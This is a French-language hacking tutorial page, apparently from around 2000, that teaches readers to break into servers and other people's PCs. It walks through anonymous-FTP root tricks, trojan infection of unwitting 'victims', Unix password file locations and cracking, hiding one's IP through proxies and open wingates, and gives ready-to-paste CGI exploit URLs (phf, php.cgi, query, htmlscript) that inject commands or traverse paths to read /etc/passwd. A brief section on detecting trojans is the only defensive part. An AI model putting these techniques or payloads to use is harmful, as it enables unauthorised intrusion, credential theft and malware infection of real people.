Une fenêtre ressemblant beaucoup au DOS va s'ouvrir. En bleu c'est ce qu'il faut taper, en vert ce que le serveur répond et en blanc mes commentaires


ftp>open url_du_site (ex : ftp>open www.aol.com)

Connected to www.aol.com Web server Microsoft FTP Service (v.4.0)

Ce qui est écrit ici dépend du systeme d'exploitation du serveur ; ce n'est pas important ici, mais ca pourra vous servir dans d'autres techniques de hack.


ftp>quote user ftp

331 Anonymous access allowed, send identify (e-mail) as password


ftp>quote cwd ~root

530 Please loggin with USER and PASS


ftp>quote pass ftp

230 Anonymous user logged in

Voila vous êtes root ou tout au pire user sur la bécane, pour devenir root, vous devez trouver le répertoire /etc et décrypter les passwords. Partie Passwords pour plus d'explications.

IMPORTANT!! : Une fois que vous êtes connecté ce sont les commandes FTP qui s'appliquent.

open Ouvre une session sur l'ordinateur distant
disconnect Termine la connexion sans fermer le programme
cd Passe dans le répertoire donné (ex : cd passwords)
dir Pour voir le contenu du répertoire ou de la racine dans lequel vous êtes
cd / Aller à la racine du lecteur
cd .. Aller au répertoire parent
pwd Pour voir où vous vous situez sur le lecteur
mkdir Créer un répertoire
rmdir Supprimer un répertoire
delete Supprimer un fichier
get Prendre un fichier chez la vicitme (il atterira sur votre bureau)
put Envoyer un fichier à la victime
mget Prendre une liste de fichiers chez la victime
mput Envoyer une liste de fichiers à la victime

-TROJANS :

-Définition :

Bon alors pour tous les neuneus qui connaitraient pas les trojans (cheval de troie pour les anglophobes), petite définition :
Un trojan est un programme composé de deux parties (une que l'on garde et l'autre que l'on envoie à sa cible) et qui vous permet, une fois que le pigeon est infecté et que vous avez récupéré son adresse IP, d'avoir plein accès à son PC et bien plus encore... :
Composants d'un trojan :

-Le serveur (ce que vous envoyez à votre victime)

-Le client (la partie du prog qui vous sert à controler le trojan)


Le serveur est un virus qui a pour but d'ouvrir un certain port de la machine infectée, dans le but de pouvoir communiquer avec le client (vous). Pour cela le trojan va se reproduire et se planquer dans le répertoire c:/windows/system. En fait ils ne sont pas cachés mais bon c'est tellement le bordel dans le répertoire system qu'il est très dur de les repérer. Une fois reproduit en nombre suffisant, le virus va essayer de se faire lancer par windows à chaque démarrage du PC, de manière à ne pas devoir réinfecter la victime à chaque fois.
Il y a deux sortes de trojans, ceux de type NetBus : vous envoyez le virus à la cible en le faisant paser pour autre chose (nuker,punter...), et en le lançant, la victime a un message d'erreur du style "vmb400321.dll not found", et là elle est infectée alors qu'elle pense juste que le "prog" marche pas.
Mais il y a une aure version encore plus vicieuse, de type Socket23, là vous avez un infecteur d'.exe. Vous prenez un exécutable (n'importe lequel) et vous l'infectez avec le générateur de virus. En recevant le "prog", la victime le lance et là le il se lance normalement... mais le lamer est infecté!

Une fois votre cible infectée, il ne vous reste plus qu'à trouver son adresse IP et vous pourrez vous connecter à son PC et y faire tout ce que vous voudrez (PAS DE CRASHING!!).
De nombreux trojans sont à télécharger dans la partie PROGZ du site.


ATTENTION!! Il n'y a pas de quoi se prendre pour un hacker si vous vous introduisez sur la bécane de quelqu'un avec un trojan! Ceci n'est pas du Hacking, mais j'ai voulu en parler ici car les trojans pulullent sur le net, et ils peuvent servir pour pas mal de truc si vous avez la flemme d'utiliser une technique plus compliquée (récupérer des passwords etc).


-Comment se protéger :

Il existe de très nombreux progz anti trojans. Le Bouffe Troyen est un des meilleurs, il détecte beaucoup de trojans. Pour BO (Back Orifice), et seulement BO, il existe une méthode très simple pour vérifier si l'on est infecté : il vous suffit de faire un ping sur l'IP 127.0.0.1 ; si vous voyez apparaître le nom de votre ordinateur...vous êtes infecté :(
Voir la partie PROGZ pour les protections anti-trojan

-LES PORTS :

Les ports sont les seuls moyens de communication de votre PC. Quand vous hackez quelqu'un, c'est par là que vous passez. Mais c'est aussi par là que ceux qui veulent vous hacker passent. On va donc définir les ports qui devront êtres watchés ou fermés. Cette opération pourra être effectuée avec Nuke Nabber ou un autre port watcher. Chaque port a un rôle bien précis ; le 21 est celui de l'accès ftp, le 110 sert à recevoir des mails etc... Vous ne devez pas watcher ou fermer trop de ports, sinon cela ralentirait considérablement votre connexion, surtout que plusieurs d'entre eux sont actuellement utilisés, donc personne ne pourra passer par là. J'ai vu dans plusieurs sites des listes avec plusieurs centaines de ports qu'il était conseillé de fermer. Essayez de le faire et vous aurez l'impression de vous retrouver avec un modem de la préhistoire... Je vais donc vous indiquer que les ports les plus sensibles, car les mecs capables de passer par d'autres ports n'ont pas grand chose à foutre de votre disque dur :) C'est surtout pour eviter d'etre emmerde par des lamerz...

N° de port : Protocole : Risque :
0 icmp Très dangereux
19 udp
21 tcp Trojan ftp
23 tcp Telnet...
53 tcp
59 tcp Nuke, flood
129 tcp
137 tcp
138 tcp
139 tcp Nuke par défaut
666 tcp
1027 tcp
1029 tcp
1032 tcp
5000 tcp Trojan Socket23
5001 tcp idem
12345 tcp Trojan NetBus
12346 tcp idem
30303 tcp Trojan
31337 tcp Trojan BO


-LES PASSWORDS :

-Passwords d'accès FTP:

Comme on l'a vu plus haut, le hack par FTP est de plus en plus difficile étant donné que la plupart (pas tous) des serveurs sont protégés. Pour trouver les pass des différents utilisateurs (ou du root), on va avoir recours à des pass crackers. Il en existe 2 sortes :


-Crackers Bute Force :

Un cracker brute force va essayer toutes les combinaisons possibles, jusqu'à trouver le pass correspondant au nom de user que vous lui aurez donné. Le crack peut ainsi durer 5min ou plusieurs jours... Autrement dit si vous n'avez pas une connexion par cable ça va être difficile (mais pas impossible). Si vous avez une connexion plutôt lente oubliez cette méthode, ou reservez la pour du cracking off-line (voir passwords shadows).

-Crackers par Word List

Un cracker par word list va essayer les pass contenus dans un fichier texte prévu à cet usage. Il cracke à partir d'un nom de user ou essaye des noms de user à partir d'une autre word list.


-Les passwords Unix :

Apparemment, les passwords Unix sont assez flous pour pas mal de monde ; je vais donc essayer de expliquer leur concept, comment les trouver, et comment les cracker.

Tout d'abord, il faut savoir qu'un systeme Unix se décline sous plusieurs versions : SunOs, Linux, BSD, etc...

Les systemes Unix sont des systemes multi utilisateurs. Chaque utilisateur (user) possède un accompte sur la machine. Chaque accompte à des droits spécifiques. Le root est le super user, il a tous les droits sur le systeme. C'est donc l'accompte qui nous interesse le plus. Les autres utilisateurs, ont des droits de lecture, d'ecriture et d'execution plus ou moins grands sur le systeme. Voila pour l'intro, maintenant passons aux passwords en eux memes.

-Structure d'un fichier password :

Un fichier password est plus ou moins long selon le nombre de users ayant un accompte sur la bécane.

Chaque ligne correspond à un utilisateur. Le fichier password sert à délimiter 7 catégories séparées entre elles par le signe " : ". Voila un exemple de fichier password, je vous le détaille plus bas :


root:9IDv/CqdFuqWo:0:0:The Super User:/:/bin/csh


root le nom de user (Attention : le root peut très bien s'apeller kannabis et non pas root)
9IDv/CqdFuqWo Le password crypté
0 numero de privileges, + le nombre est petit + l'user a de privileges (0=root)
0 numero de groupe auquel l'utilisateur appartient
The Super User champ de commentaires
/ Répertoire home du user, là où il se retrouve lorqu'il se logge sur le systeme (ici le répertoire racine)
/bin/csh Le shell du user

Voilà à quoi correspondent les différentes parties du password file.


-Acceder à un password file

Vous le savez surement, sur les systemes unix, les passwords se trouvent par défaut dans le répertoire /etc/passwd . C'était un peu trop facile alors les pass ont ont été shadowed (passwords shadows) ; dans le fichier /etc/passwd , à la place du mot de passe crypté vous avez un "x" ou une "*". En fait le password file non shadowed a été déplacé dans un répertoire spécifique, prévu à cet effet. Ce répertoire change selon le type d'OS.
Donc si vous voulez accéder aux password file shadowed, vous devez vous renseigner sur le type d'OS de la bécane. Une fois que vous l'avez découvert, reportez vous au tableau suivant pour savoir dans quel répertoire aller. Dans ces répertoires vous verrez donc les pass cryptées et non pas ces %£$*@]+~#\!! d'étoiles =)

AIX 3
etc/security/passwords

A/UX 3.Os
tcb/files/auth

BSD4.3-Reno
etc/master/passwd

ConvexOS 10
etc/shadow

Convex0S 11
etc/shadow

DG/UX
etc/tcb/aa/user

EP/IX
etc/shadow

HP-UX
secure/etc/passwd

IRIX 5
etc/shadow

Linux 1.1
etc/shadow

SunOS 4.1+c2
etc/security/passwd/adjunct

SunOS 5.0
etc/shadow

System V 4.0
etc/shadow

UNICOS
etc/udb

-Décrypter un password file

Cool j'ai réussi à chopper un password file, mais comment je fais pour le décrypter?!
Tout d'abord il vous faut un cracker de pass unix comme CrackerJack ou JohnTheRipper (partie PROGZ). Contrairement a ce que beaucoup de personnes croient, les mots de passe Unix ne peuvent pas etre décryptes. En fait, le programme de login encrypte le texte que vous tapez au prompt de "password:" et le compare avec la chaine de caractere encryptee dans le fichier de mot de passe.
Un crackeur Unix utilise une liste de mots. Chaque mot de la liste encrypté et les resultats sont compares avec fichier de mot de passe cible. C'est toujours bon à savoir...


-IP SPOOFING :

Ici on va voir comment cacher son IP en passant par des proxys. J'en entends deja qui disent "Mais c'est pas du vrai spoofing!!!" ; c'est vrai que ce n'est pas du spoof pur et dur qui consiste à passer outre des firewall ou de s'infiltrer sur des routeurs. Mais le spoof pur nécessite une très bonne connaissance des nombreux protocoles réseaux et évidemment il faut Linux.

Tout d'abord on va définir ce qu'est un proxy puis ensuite on va voir comment les utiliser.

-Définition d'un proxy :
Pour utiliser un proxy il faut se connecter à celui ci, mais on verra ca plus loin. Voilà en fait le principe en gros (tres gros :)) :
Vous êtes sur le web et vous tapez une url dans votre browser, votre pc va alors envoyer une requete au serveur ou se trouve la page, dans cette requete se trouvent l'ip ainsi que quelques autres renseignements servants à établir la connexion. On a donc :


VOUS<---------------->Serveur de page web


La connexion est donc directe et chaque ordianteur connait l'IP de l'autre :(

Voyons maintenant ce qu'il se passe quand vous êtes connecté à un proxy. Votre pc va envoyer la requête au proxy qui se chargera de la transmettre au serveur de page web, mais le proxy fera comme si la page était pour lui, et il vous la transmettradès qu'il l'aura recue. Le serveur ne sera donc pas au courant que la page est en fait pour vous. Petit schéma :


VOUS------->Proxy=========>Serveur
VOUS<=====Proxy<-----------Serveur

Voilà donc pourquoi avec un proxy vous êtes totalement anonyme. Il doit quand même y avoir moyen de vous tracer mais si il y a beaucoup de personnes sur le proxy (c a d de personnes connectées comme vous) il sera impossible de vous retrouver (du moins si vous restez raisonnables) :))

-Utilisation d'un proxy :
Vous pouvez passer par un proxy dans les cas suivants : ftp, web, telnet, irc, icq...
-Sur le web :
Pour pouvoir surfer anonymement, vous devez configurer votre browser pour qu'il passe par le proxy.
Netscape (communicator 4.5) :
-Cliquez sur édition => Préférences
-Dans la liste des options à gauche faites derouler Avancées et cliquez sur proxy
-Choisissez Configuration manuelle, puis Afficher.
-Dans la ligne HTTP tapez l'adresse du proxy (une adresse de proxy ca ressemble à ca : proxyfs1.und.ac.za mais ca peut pas mal changer) dans port tapez le port qui vous est donné avec l'adresse.
-Meme chose pour la ligne FTP.
Ca y est vous surfez avec netscape anonymement :)

Internet Explorer 5 (beurk):
Je vous déconseille vivement ie qui est vraiment merdique mais bon...
-Cette fois vous devez cliquer sur Outils
-Puis Options Internet
-Choisissez l'onglet Connexion
-Cliquez sur Paramètres LAN, utiliser un serveur proxy puis tapez l'adresse et le port

-Sous Mirc :
-A peine plus compliqué, dans les options IRC cliquez sur Firewall
-Cliquez sur Use Socks Firewall, puis sock 4
-Tapez l'adresse du proxy dans hostname puis le port
-Cliquez sur local info à gauche et dans local host retapez l'adresse du proxy
-Connectez vous

-En session Telnet :
Il vous faut un client Telnet développé, c a d qui comporte des fonctions supplémentaires, car le client telnet de windows n'accepte pas les proxys. Dans la partie PROGZ du site vous trouverez un très bon client Telnet dévemoppé : CRT3.0 . Je vais vous décrire la technique pour ce client.
-Cliquez sur Options
-Choisissez global options, puis dans l'écran apparu (semblable à celui de netscape) cliquez à gauche sur firewall et dans le Type à gauche prenez Socks4
-Pour le reste je crois que vous commencez à savoir comment faire... :)

-En session FTP :
-Il vous faut ftp expert (c'est celui que j'utilise) car il permet les connexions par proxy. Bon ça commence à me saouler de décrire les manips comme ça et je sens que vous aussi. Tout ce que vous devez savoir c'est qu'il faut aller dans les options et chercher firewall ou proxy, et ca c'est bon pour pas mal de progs donc si vous n'avez pas exactement ceux que j ai cités, cherchez ces options dans les votres :)

Voilà c'est tout, maintenant vous pouvez être anonyme à peu près partout amusez vous bien :)

-Les Wingates :
Les wingates sont des programmes residants, qui tournent sur win 9x/NT et qui permettent de partager une connexion au net avec d'autres ordinateurs d un reseau local. Mais tres souvent les wingates sont mal configures et n'importe qui peut s'en servir =)
Le wingate fonctionnera alors comme un proxy (voir plus haut) et le serveur de destination aura l'ip du gate et pas la votre.

-Trouver un wingate :
Il existe un prog tres pratique : wingate scan qui se chargera de vous macher le travail. Je vais quand meme vous expliquer coment il fonctionne, c'est tres simple. Vous lui donnez une serie d'IP, par exemple de 155.202.20.1 à 155.202.20.255 (voir l'article sur les adresses IP) et il va effectuer un telnet sur chancune de ces IP si la reponse d'une des IP est "Wingate>" , c'est bien une wingate ! =) Vous pouvez le faire manuellement en ouvrant une session telnet sur une IP que vous pensez etre une wingate, si vous recevez le prompt "Wingate>" c'est bon. C'est quand meme bien plus long!...

-Utilisation d'un wingate :
C est bon vous avez un wingate? bon on va voir comment s en servir
Vous venez de vous y connecter et vous avec "Wingate>" au prompt.
mainetant tapez ce qui suit
ip_de_la_cible port
ex : 172.203.155.222 25
Cela vous connectera à l ip 172.203.155.222 sur le port 25 SMTP (voir mails anonymes) dans ce cas là l'ip qui normalement est visible dans le mail anonyme ne sera pas la votre mais celle du gate =) Vous n'êtes pas limité au port 25, vous pouvez vous connecter sur le port de votre choix.

ATTENTION : si vous passez par des gates pour hacker sur des telnet faites attention aux log (votre ip peut etre enregistree par le wingate). J'ai meme entendu dire que certains wingates etaient mises en service dans le seul but d'enregistrer toutes les actions que feront les personnes qui se connectées (l'info est à verifier)...


-SCRIPTS ET CGI

Meme si vous n en êtes pas conscients, vous avez tous deja utilise des scripts et des CGI. Les CGI sont des programmes écrits en langage C ; ce sont eux qui vous permettent de faire des recherches par mots clés par exemple (yahoo, altavista etc). Ca ressemble à peu près à ca sous Altavista :

http://altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=flashack

Voila donc un exemple de CGI. Ce qui nous interesse nous c'est que certains de ces scripts sont buggés, on peut donc se servir de ces bugs pour hacker le serveur et obtenir l'accès root sur la bécane :). Ces bugs sont spécifiques et ne s'appliquent qu'à certains OS (systemes d'exploitation). Plutôt que d'essayer tous ceux que je vais vous donner "à l'aveuglette", sur le serveur que vous voulez hacker, vous pouvez vous connecter avec le ftp -n sur la cible ; vous tapez open www.cible.com et en réponse le serveur vous donne quelques renseignements, ainsi que la version de l'OS. Vous savez donc quels sont les scripts qui sont susceptibles de fonctionner.


BUG Pfs :
Il s'applique aux serveurs tournants sous NCSA (version 1.5 ou antérieure) ; et Apache (1.0.3 ou antérieure). Permet d'acceder au répertore /etc/password. Une fois que vous l'avez récupéré vous n'avez plus qu'à utiliser cracker jack pour le décrypter.

http://www.cible.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
ou
http://www.cible.com/cgi-bin/phf?Qname=x%0a/bin/cat%20/etc/passwd


BUG Php :
Même chose que précedemment.

http://www.cible.com/cgi-bin/php.cgi?/etc/passwd

ou

http://www.cible.com/cgi-bin/php?/etc/passwd


BUG Query :
Toujours le même effet : accès au répertoire /etc/password

http://url_du site/cgi-bin/query?%0a/bin/cat%20/etc/passwd


BUG Htmlscript :
Ce bug sert encore à devenir root en accedant au répertoir /etc/password . Le tout est de savoir où se situe le script CGI par rapport au /etc/password sur la bécane. Vous pouvez changer le nombre de ../ pour faire varier le nombre de dossiers à remonter dans l'arborescence de la cible.

http://url_du_site/cgi-bin/htmlscript?../../etc/passwd

C'est tout pour cette fois mais de nouveaux bugs arriveront très prochainement :)

Gestion du site - © Jobi One Média 2000